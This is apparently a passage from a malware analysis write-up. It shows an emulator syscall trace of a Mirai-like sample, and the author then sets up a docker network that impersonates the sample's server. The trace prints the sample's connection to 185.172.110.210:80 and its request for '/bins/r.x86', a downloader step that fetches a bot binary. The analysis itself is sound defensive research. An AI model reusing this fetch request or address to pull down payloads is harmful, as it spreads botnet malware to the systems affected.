[main] [SYSCALL] write ( fd=0x1 (stdout), buf=0x8048381 ("TF"), count=0x2 ) -> 2
[main] [SYSCALL] open ( pathname=0x8048385 ("Dawd2AD"), flags=0x241 ) -> 10
[main] [SOCKET SYSCALL] [08048352] socket ( domain=0x2 (INET), type=0x1, protocol=0x0 )
[main] [SYSCALL] socketcall ( domain=0x2 (INET), type=0x1, protocol=0x0 ) -> 14
[main] [SOCKET SYSCALL] [08048352] connect ( sockfd=0x14 (AF_INET:SOCK_STREAM:?:?), dest_addr=0xff08ee8c (185.172.110.210:80), addrlen=0x10 )
[main] [SYSCALL] socketcall ( sockfd=0x14 (AF_INET:SOCK_STREAM:?:?), dest_addr=0xff08ee8c (185.172.110.210:80), addrlen=0x10 ) -> 0
[HIGHLIGHTS] [main]: File written: File name: SocketHandle, sock#000, Wrote 35 bytes
[main] [SYSCALL] write ( fd=0x14 (socket), buf=0x8048392 ("GET /bins/r.x86 HTTP/1.0\r\n\r\n\x00INT\n\x00\x00"), count=0x23 ) -> 23
received: 'b'0''
[main] [SYSCALL] read ( fd=0x14 (socket), buf=0xff08ee9f, count=0x1 ) -> 1
received: 'b'0''
[main] [SYSCALL] read ( fd=0x14 (socket), buf=0xff08ee9f, count=0x1 ) -> 1
received: 'b'0''
...
received: 'b'0''
22:41:48:syscall_li:INFO__:Syscall read called 50 times. No longer printing syscalls
^C...
KeyboardInterrupt
22:41:50:syscall_li:INFO__:Syscall printing reenabled
[main] [SYSCALL] exit ( status=0x4 ) -> void
22:41:50:threads___:ERROR_:Thread main failed: syscall Exit_Group status 4
From that we can see that sample tries to connect to the ip address 185.172.110.210 on port 80, asks for /bins/r.x86, get's nothing and exits. What can we do with all that information?
https://github.com/radareorg/radare2/blob/master/doc/intro.md
:~/MALWARE/CASE_001 ~ docker network create --subnet=185.172.0.0/16 mirai 8596541d6184ebd4288e73031a07200b5c178135e957109d273312a84bae3b77
:~/MALWARE/CASE_001 ~ docker run --net mirai --ip 185.172.110.210 -it ubuntu bash